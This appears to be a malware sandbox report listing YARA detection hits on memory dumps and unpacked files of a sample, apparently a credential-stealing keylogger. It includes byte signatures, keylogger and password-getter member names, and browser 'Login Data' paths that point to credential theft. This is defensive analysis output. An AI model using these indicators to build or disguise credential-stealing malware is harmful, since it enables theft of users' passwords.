0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7ffdf:$a1: get_encryptedPassword 0x7ffb3:$a2: get_encryptedUsername 0x80077:$a3: get_timePasswordChanged 0x7ff8f:$a4: get_passwordField 0x7fff5:$a5: set_encryptedPassword 0x7fdc2:$a7: get_logins 0x7b43d:$a10: KeyLoggerEventArgs 0x7b40c:$a11: KeyLoggerEventArgsEventHandler 0x7fe96:$a13: _encryptedPassword
0000000F.00000002.3853601584.000000002D8E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000D.00000002.3852283482.000000001CB71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000F.00000002.3857060736.000000002E981000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.3857060736.000000002E981000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000F.00000002.3820808397.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000007.00000003.2179264419.000000007FCB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
0000000F.00000001.2369555463.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f299:$a1: get_encryptedPassword 0x3f26d:$a2: get_encryptedUsername 0x3f331:$a3: get_timePasswordChanged 0x3f249:$a4: get_passwordField 0x3f2af:$a5: set_encryptedPassword 0x3f07c:$a7: get_logins 0x3a6f7:$a10: KeyLoggerEventArgs 0x3a6c6:$a11: KeyLoggerEventArgsEventHandler 0x3f150:$a13: _encryptedPassword
Process Memory Space: npratlsN.pif PID: 7716	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: npratlsN.pif PID: 7716	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: npratlsN.pif PID: 7716	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: npratlsN.pif PID: 7716	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x4559e:$a1: get_encryptedPassword 0x130f41:$a1: get_encryptedPassword 0x16b11a:$a1: get_encryptedPassword 0x25ef43:$a1: get_encryptedPassword 0x45572:$a2: get_encryptedUsername 0x130f15:$a2: get_encryptedUsername 0x16b0ee:$a2: get_encryptedUsername 0x25ef17:$a2: get_encryptedUsername 0x45636:$a3: get_timePasswordChanged 0x130fd9:$a3: get_timePasswordChanged 0x16b1b2:$a3: get_timePasswordChanged 0x25efdb:$a3: get_timePasswordChanged 0x4554e:$a4: get_passwordField 0x130ef1:$a4: get_passwordField 0x16b0ca:$a4: get_passwordField 0x25eef3:$a4: get_passwordField 0x455b4:$a5: set_encryptedPassword 0x130f57:$a5: set_encryptedPassword 0x16b130:$a5: set_encryptedPassword 0x25ef59:$a5: set_encryptedPassword 0x4538a:$a7: get_logins
Process Memory Space: npratlsN.pif PID: 8008	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: npratlsN.pif PID: 8008	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: npratlsN.pif PID: 8008	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: npratlsN.pif PID: 8008	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x218a4:$a1: get_encryptedPassword 0x7da19:$a1: get_encryptedPassword 0x1cfe9c:$a1: get_encryptedPassword 0x21a32a:$a1: get_encryptedPassword 0x21878:$a2: get_encryptedUsername 0x7d9ed:$a2: get_encryptedUsername 0x1cfe70:$a2: get_encryptedUsername 0x21a2fe:$a2: get_encryptedUsername 0x2193c:$a3: get_timePasswordChanged 0x7dab1:$a3: get_timePasswordChanged 0x1cff34:$a3: get_timePasswordChanged 0x21a3c2:$a3: get_timePasswordChanged 0x21854:$a4: get_passwordField 0x7d9c9:$a4: get_passwordField 0x1cfe4c:$a4: get_passwordField 0x21a2da:$a4: get_passwordField 0x218ba:$a5: set_encryptedPassword 0x7da2f:$a5: set_encryptedPassword 0x1cfeb2:$a5: set_encryptedPassword 0x21a340:$a5: set_encryptedPassword 0x21690:$a7: get_logins
Process Memory Space: npratlsN.pif PID: 8188	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: npratlsN.pif PID: 8188	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: npratlsN.pif PID: 8188	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: npratlsN.pif PID: 8188	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x6131:$a1: get_encryptedPassword 0x1e5af8:$a1: get_encryptedPassword 0x208525:$a1: get_encryptedPassword 0x2ac4cd:$a1: get_encryptedPassword 0x6105:$a2: get_encryptedUsername 0x1e5acc:$a2: get_encryptedUsername 0x2084f9:$a2: get_encryptedUsername 0x2ac4a1:$a2: get_encryptedUsername 0x61c9:$a3: get_timePasswordChanged 0x1e5b90:$a3: get_timePasswordChanged 0x2085bd:$a3: get_timePasswordChanged 0x2ac565:$a3: get_timePasswordChanged 0x60e1:$a4: get_passwordField 0x1e5aa8:$a4: get_passwordField 0x2084d5:$a4: get_passwordField 0x2ac47d:$a4: get_passwordField 0x6147:$a5: set_encryptedPassword 0x1e5b0e:$a5: set_encryptedPassword 0x20853b:$a5: set_encryptedPassword 0x2ac4e3:$a5: set_encryptedPassword 0x5f1d:$a7: get_logins
Click to see the 106 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
17.2.npratlsN.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
17.1.npratlsN.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
15.1.npratlsN.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
13.1.npratlsN.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
17.2.npratlsN.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
13.2.npratlsN.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
15.2.npratlsN.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
14.2.Nsltarpn.PIF.20f567a8.4.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x3ccb0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x3d330:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
15.2.npratlsN.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
15.2.npratlsN.pif.2fd20000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.npratlsN.pif.2fd20000.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.2.npratlsN.pif.2fd20000.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.npratlsN.pif.2fd20000.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.npratlsN.pif.2fd20000.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.npratlsN.pif.2fd20000.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f5d9:$a1: get_encryptedPassword 0x3f5ad:$a2: get_encryptedUsername 0x3f671:$a3: get_timePasswordChanged 0x3f589:$a4: get_passwordField 0x3f5ef:$a5: set_encryptedPassword 0x3f3bc:$a7: get_logins 0x3aa37:$a10: KeyLoggerEventArgs 0x3aa06:$a11: KeyLoggerEventArgsEventHandler 0x3f490:$a13: _encryptedPassword
15.2.npratlsN.pif.2fd20000.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a708:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49dab:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a008:$a4: \Orbitum\User Data\Default\Login Data 0x4a9e7:$a5: \Kometa\User Data\Default\Login Data
15.2.npratlsN.pif.2fd20000.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d18c:$s1: UnHook 0x3d128:$s2: SetHook 0x3d161:$s3: CallNextHook 0x3d0f0:$s4: _hook
13.2.npratlsN.pif.1f7f0000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.npratlsN.pif.1f7f0000.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
13.2.npratlsN.pif.1f7f0000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
13.2.npratlsN.pif.1f7f0000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.npratlsN.pif.1f7f0000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.2.npratlsN.pif.2812a8ee.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.npratlsN.pif.2812a8ee.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.npratlsN.pif.2812a8ee.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.npratlsN.pif.2812a8ee.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.2.npratlsN.pif.1f7f0000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
17.2.npratlsN.pif.2812a8ee.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c8f1:$a1: get_encryptedPassword 0x3c8c5:$a2: get_encryptedUsername 0x3c989:$a3: get_timePasswordChanged 0x3c8a1:$a4: get_passwordField 0x3c907:$a5: set_encryptedPassword 0x3c6d4:$a7: get_logins 0x37d4f:$a10: KeyLoggerEventArgs 0x37d1e:$a11: KeyLoggerEventArgsEventHandler 0x3c7a8:$a13: _encryptedPassword
17.2.npratlsN.pif.2812a8ee.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47a20:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x470c3:$a3: \Google\Chrome\User Data\Default\Login Data 0x47320:$a4: \Orbitum\User Data\Default\Login Data 0x47cff:$a5: \Kometa\User Data\Default\Login Data
17.2.npratlsN.pif.2812a8ee.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a4a4:$s1: UnHook 0x3a440:$s2: SetHook 0x3a479:$s3: CallNextHook 0x3a408:$s4: _hook
13.2.npratlsN.pif.1f7f0000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
13.2.npratlsN.pif.1f7f0000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
13.2.npratlsN.pif.1c7ca8ee.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.npratlsN.pif.1c7ca8ee.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
13.2.npratlsN.pif.1c7ca8ee.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
13.2.npratlsN.pif.1c7ca8ee.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.npratlsN.pif.1c7ca8ee.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.2.npratlsN.pif.1c7ca8ee.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
13.2.npratlsN.pif.1c7ca8ee.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
13.2.npratlsN.pif.1c7ca8ee.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
15.2.npratlsN.pif.2fd20000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.npratlsN.pif.2fd20000.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.npratlsN.pif.2fd20000.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.npratlsN.pif.2fd20000.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.npratlsN.pif.2fd20000.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d7d9:$a1: get_encryptedPassword 0x3d7ad:$a2: get_encryptedUsername 0x3d871:$a3: get_timePasswordChanged 0x3d789:$a4: get_passwordField 0x3d7ef:$a5: set_encryptedPassword 0x3d5bc:$a7: get_logins 0x38c37:$a10: KeyLoggerEventArgs 0x38c06:$a11: KeyLoggerEventArgsEventHandler 0x3d690:$a13: _encryptedPassword
15.2.npratlsN.pif.2fd20000.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48908:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47fab:$a3: \Google\Chrome\User Data\Default\Login Data 0x48208:$a4: \Orbitum\User Data\Default\Login Data 0x48be7:$a5: \Kometa\User Data\Default\Login Data
15.2.npratlsN.pif.2fd20000.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b38c:$s1: UnHook 0x3b328:$s2: SetHook 0x3b361:$s3: CallNextHook 0x3b2f0:$s4: _hook
